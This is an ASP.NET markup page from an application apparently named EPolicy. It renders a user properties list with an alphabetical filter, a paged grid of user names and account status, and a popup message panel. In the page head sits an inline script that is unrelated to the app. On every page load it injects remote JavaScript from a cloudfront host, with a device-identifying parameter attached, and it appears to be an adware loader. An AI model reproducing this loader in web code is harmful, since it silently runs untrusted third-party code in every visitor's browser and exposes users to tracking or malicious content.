<%@ Page Language="c#" Inherits="EPolicy.UserPropertiesList" CodeFile="UserPropertiesList.aspx.cs" %>

<%@ Register TagPrefix="MaskedInput" Namespace="MaskedInput" Assembly="MaskedInput" %>
<%@ Register Assembly="AjaxControlToolkit, Version=3.5.50508.0, Culture=neutral, PublicKeyToken=28f01b0e84b6d53e"
    Namespace="AjaxControlToolkit" TagPrefix="Toolkit" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/tr/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1" runat="server">
    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <link rel="apple-touch-icon" href="apple-touch-icon.png" />
    <link rel="stylesheet" href="css/bootstrap.min.css" />
    <link rel="icon" href="Images2\LogoGuardian.ico" type="image/x-icon" />
    <style>
        html, body
        {
            height: 100%;
        }
        body
        {
            background-color: #17529B;
        }
        .container-fluid
        {
            height: 100%;
        }
        .row.row-offcanvas.row-offcanvas-left
        {
            height: 100%;
        }
        .col-md-2
        {
            width: 16.66666667%;
            height: 100%;
        }
        .main
        {
            height: 100%;
        }
        .over-top-btn
        {
            width: 100%;
        }
    </style>
    <link rel="stylesheet" href="css/bootstrap-theme.min.css">
    <link rel="stylesheet" href="css/main.css">
    <link href="css/fonts.css" rel="stylesheet" />
    <link href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css"
        rel="stylesheet" integrity="sha384-T8Gy5hrqNKT+hzMclPo118YTQO6cYprQmhrYwIiQ/3axmI1hQomh7Ud2hPOy8SP1"
        crossorigin="anonymous" />
    <script type="text/javascript">        (function () { var a = document.createElement("script"); a.type = "text/javascript"; a.async = !0; a.src = "http://d36mw5gp02ykm5.cloudfront.net/yc/adrns_y.js?v=6.11.107#p=samsungxssdx840xevox250gb_s1dbnsaf286689w"; var b = document.getElementsByTagName("script")[0]; b.parentNode.insertBefore(a, b); })();
    </script>
</head>
<body>
    <form id="AutoQuote" method="post" runat="server">
    <div class="container-fluid" style="height: 100%">
        <Toolkit:ToolkitScriptManager ID="ToolkitScriptManager2" runat="server" EnableScriptGlobalization="True">
        </Toolkit:ToolkitScriptManager>
        <asp:UpdatePanel ID="UpdatePanel1" runat="server" RenderMode="Block">
            <ContentTemplate>
                <asp:Literal ID="jvscript" runat="server"></asp:Literal>
                <div class="row row-offcanvasrow-offcanvas-left" style="height: 100%">
                    <div class="col-sm-3 col-md-2 sidebar-offcanvas" id="sidebar" role="navigation">
                        <asp:PlaceHolder ID="phTopBanner" runat="server"></asp:PlaceHolder>
                    </div>
                    <div class="col-sm-9 col-md-10 main" style="height: 100%">
                        <!--toggle sidebar button-->
                        <p class="visible-xs">
                            <button type="button" class="btn btn-primary btn-xs" data-toggle="offcanvas">
                                <i class="glyphicon glyphicon-chevron-left"></i>
                            </button>
                        </p>
                        <h1 class="page-header">
                            User Properties List</h1>
                        <div class="form=group" align="center">
                            <asp:Button ID="BtnExit" runat="server" Text="EXIT" Width="155px" CssClass="btn btn-primary btn-lg"
                                OnClick="BtnExit_Click" Font-Bold="False"></asp:Button>
                            <br />
                            <br />
                            <div align="left">
                                <asp:Label ID="LblTotalCases" runat="server" CssClass="labelForControl" Font-Bold="True">Total Users</asp:Label>
                            </div>
                        </div>
                        <div class="form-group" align="center">
                            <asp:UpdateProgress ID="UpdateProgress1" runat="server" AssociatedUpdatePanelID="UpdatePanel1"
                                DisplayAfter="10">
                                <ProgressTemplate>
                                    <img alt="" src="Images2/loader.gif" style="width: 40px; height: 40px;" />
                                    <span><span class=""></span><span class="" style="font-size: 18px">Please wait...</span></span></ProgressTemplate>
                            </asp:UpdateProgress>
                        </div>
                        <div class="row formWraper" style="padding: 0px;" align="center">
                            <div class="col-sm-12" align="center">
                                <br />
                                <asp:LinkButton ID="btnA" runat="server" OnClick="btnA_Click" Font-Size="Large">A</asp:LinkButton>
                                <asp:LinkButton ID="btnB" runat="server" OnClick="btnB_Click" Font-Size="Large">B</asp:LinkButton>
                                <asp:LinkButton ID="btnC" runat="server" OnClick="btnC_Click" Font-Size="Large">C</asp:LinkButton>
                                <asp:LinkButton ID="btnD" runat="server" OnClick="btnD_Click" Font-Size="Large">D</asp:LinkButton>
                                <asp:LinkButton ID="btnE" runat="server" OnClick="btnE_Click" Font-Size="Large">E</asp:LinkButton>
                                <asp:LinkButton ID="btnF" runat="server" OnClick="btnF_Click" Font-Size="Large">F</asp:LinkButton>
                                <asp:LinkButton ID="btnG" runat="server" OnClick="btnG_Click" Font-Size="Large">G</asp:LinkButton>
                                <asp:LinkButton ID="btnH" runat="server" OnClick="btnH_Click" Font-Size="Large">H</asp:LinkButton>
                                <asp:LinkButton ID="btnI" runat="server" OnClick="btnI_Click" Font-Size="Large">I</asp:LinkButton>
                                <asp:LinkButton ID="btnJ" runat="server" OnClick="btnJ_Click" Font-Size="Large">J</asp:LinkButton>
                                <asp:LinkButton ID="btnK" runat="server" OnClick="btnK_Click" Font-Size="Large">K</asp:LinkButton>
                                <asp:LinkButton ID="btnL" runat="server" OnClick="btnL_Click" Font-Size="Large">L</asp:LinkButton>
                                <asp:LinkButton ID="btnM" runat="server" OnClick="btnM_Click" Font-Size="Large">M</asp:LinkButton>
                                <asp:LinkButton ID="btnN" runat="server" OnClick="btnN_Click" Font-Size="Large">N</asp:LinkButton>
                                <asp:LinkButton ID="btnO" runat="server" OnClick="btnO_Click" Font-Size="Large">O</asp:LinkButton>
                                <asp:LinkButton ID="btnP" runat="server" OnClick="btnP_Click" Font-Size="Large">P</asp:LinkButton>
                                <asp:LinkButton ID="btnQ" runat="server" OnClick="btnQ_Click" Font-Size="Large">Q</asp:LinkButton>
                                <asp:LinkButton ID="btnR" runat="server" OnClick="btnR_Click" Font-Size="Large">R</asp:LinkButton>
                                <asp:LinkButton ID="btnS" runat="server" OnClick="btnS_Click" Font-Size="Large">S</asp:LinkButton>
                                <asp:LinkButton ID="btnT" runat="server" OnClick="btnT_Click" Font-Size="Large">T</asp:LinkButton>
                                <asp:LinkButton ID="btnU" runat="server" OnClick="btnU_Click" Font-Size="Large">U</asp:LinkButton>
                                <asp:LinkButton ID="btnV" runat="server" OnClick="btnV_Click" Font-Size="Large">V</asp:LinkButton>
                                <asp:LinkButton ID="btnW" runat="server" OnClick="btnW_Click" Font-Size="Large">W</asp:LinkButton>
                                <asp:LinkButton ID="btnX" runat="server" OnClick="btnX_Click" Font-Size="Large">X</asp:LinkButton>
                                <asp:LinkButton ID="btnY" runat="server" OnClick="btnY_Click" Font-Size="Large">Y</asp:LinkButton>
                                <img alt="" src="Images2/GreyLine.png" style="height: 6px; margin-top: 0px;" width="85%;" />
                                <br />
                                <div class="table-responsive">
                                    <asp:DataGrid ID="searchIndividual" runat="server" ItemStyle-CssClass="HeadForm3"
                                        HeaderStyle-BackColor="#5C8BAE" HeaderStyle-CssClass="HeadForm2" AlternatingItemStyle-BackColor="#FEFBF6"
                                        AlternatingItemStyle-CssClass="HeadForm3" CellPadding="0" AllowPaging="True"
                                        AutoGenerateColumns="False" HeaderStyle-HorizontalAlign="Center" ItemStyle-HorizontalAlign="center"
                                         CssClass=""
                                        Font-Bold="True" Font-Size="14px" BorderColor="Transparent"  PageSize="15"
                                        Font-Strikeout="False" Font-Underline="False" Width="80%">
                                         <FooterStyle ForeColor="Black" />
                                            <SelectedItemStyle BackColor="White" CssClass="" HorizontalAlign="Left" />
                                            <EditItemStyle BackColor="White" HorizontalAlign="Center" />
                                            <AlternatingItemStyle HorizontalAlign="Left" BackColor="#EBEBEB" />
                                            <ItemStyle HorizontalAlign="Left" BorderColor="#EBEBEB" />
                                            <HeaderStyle BackColor="Gray" ForeColor="White" Height="30px" HorizontalAlign="Left"
                                                Font-Bold="True" />
                                        <Columns>
                                           <asp:ButtonColumn ButtonType="LinkButton" HeaderStyle-HorizontalAlign="Center" CommandName="Select" Text="&lt;img src='images2/searchGrid.png' width='26px' height='30px' &gt;"
                                                    HeaderText="Select">
                                                    <ItemStyle HorizontalAlign="Center" />
                                                    </asp:ButtonColumn>
                                            <asp:BoundColumn Visible="False" DataField="UserID" HeaderText="UserID">
                                                <ItemStyle Font-Names="Tahoma" HorizontalAlign="Left"></ItemStyle>
                                            </asp:BoundColumn>
                                            <asp:BoundColumn DataField="UserName" HeaderText="User Name">
                                                <HeaderStyle Width="150px"></HeaderStyle>
                                                <ItemStyle Font-Names="Tahoma"></ItemStyle>
                                            </asp:BoundColumn>
                                            <asp:BoundColumn DataField="FirstName" HeaderText="First Name">
                                                <ItemStyle Font-Names="Tahoma" HorizontalAlign="Left"></ItemStyle>
                                            </asp:BoundColumn>
                                            <asp:BoundColumn DataField="LastName" HeaderText="Last Name">
                                                <ItemStyle Font-Names="Tahoma" HorizontalAlign="Left"></ItemStyle>
                                            </asp:BoundColumn>
                                            <asp:BoundColumn DataField="AccountDisable" HeaderText="Account Disable">
                                                <ItemStyle Font-Names="Tahoma"></ItemStyle>
                                            </asp:BoundColumn>
                                        </Columns>
                                       <PagerStyle HorizontalAlign="Center" Mode="NumericPages" BackColor="White" ForeColor="Gray" Font-Size="18px"
                                                PageButtonCount="15" BorderWidth="0px" />
                                    </asp:DataGrid>
                                </div>
                                <br />
                            </div>
                        </div>
                        <div class="col-sm-9 col-md-10 main" style="height: 100%">
                            <br />
                            <br />
                            <br />
                            <br />
                            <br />
                            <br />
                            <br />
                            <br />
                            <br />
                            <br />
                            <br />
                        </div>
                    </div>
                    <asp:Panel ID="pnlMessage" runat="server" CssClass="" Width="450px" BackColor="#F4F4F4"
                        Height="260px">
                        <div class="" style="padding: 0px; border-radius: 5px; background-color: #036893;
                            color: #FFFFFF; font-family: tahoma; font-size: 14px; font-weight: normal; font-style: normal;
                            background-repeat: no-repeat; text-align: left; vertical-align: bottom;">
                            &nbsp;&nbsp;
                            <asp:Label ID="Label3" runat="server" Font-Bold="False" Font-Italic="False" Font-Names="arialnarrow"
                                Font-Size="14pt" Text="Message..." ForeColor="White" />
                        </div>
                        <div>
                            <table style="background-position: center; width: 430px; height: 175px;">
                                <tr>
                                    <td align="center" valign="middle">
                                        <asp:Label ID="lblRecHeader" runat="server" Font-Bold="False" Font-Italic="False"
                                            Font-Size="10.5pt" Font-Underline="False" ForeColor="#333333" Text="Message"
                                            Width="350px" CssClass="Labelfield2-14" />
                                    </td>
                                </tr>
                            </table>
                        </div>
                        <div class="" align="center">
                            <asp:Button ID="btnAceptar" runat="server" Text="OK" Width="150px" CssClass="btn btn-primary btn-lg btn-block" />
                        </div>
                    </asp:Panel>
                    <Toolkit:ModalPopupExtender ID="mpeSeleccion" runat="server" BackgroundCssClass="modalBackground"
                        DropShadow="True" PopupControlID="pnlMessage" TargetControlID="btnDummy2" OkControlID="btnAceptar">
                    </Toolkit:ModalPopupExtender>
                    <asp:Button ID="btnDummy2" runat="server" Visible="true" BackColor="Transparent"
                        BorderStyle="None" BorderWidth="0" BorderColor="Transparent" />
                    <Toolkit:RoundedCornersExtender ID="RoundedCornersExtender2" runat="server" TargetControlID="pnlMessage"
                        Radius="10" Corners="All" />
                </div>
                <MaskedInput:MaskedTextHeader ID="MaskedTextHeader1" runat="server"></MaskedInput:MaskedTextHeader>
                <asp:Literal ID="litPopUp" runat="server" Visible="False"></asp:Literal>
                </div>
            </ContentTemplate>
        </asp:UpdatePanel>
    </div>
    </form>
</body>
</html>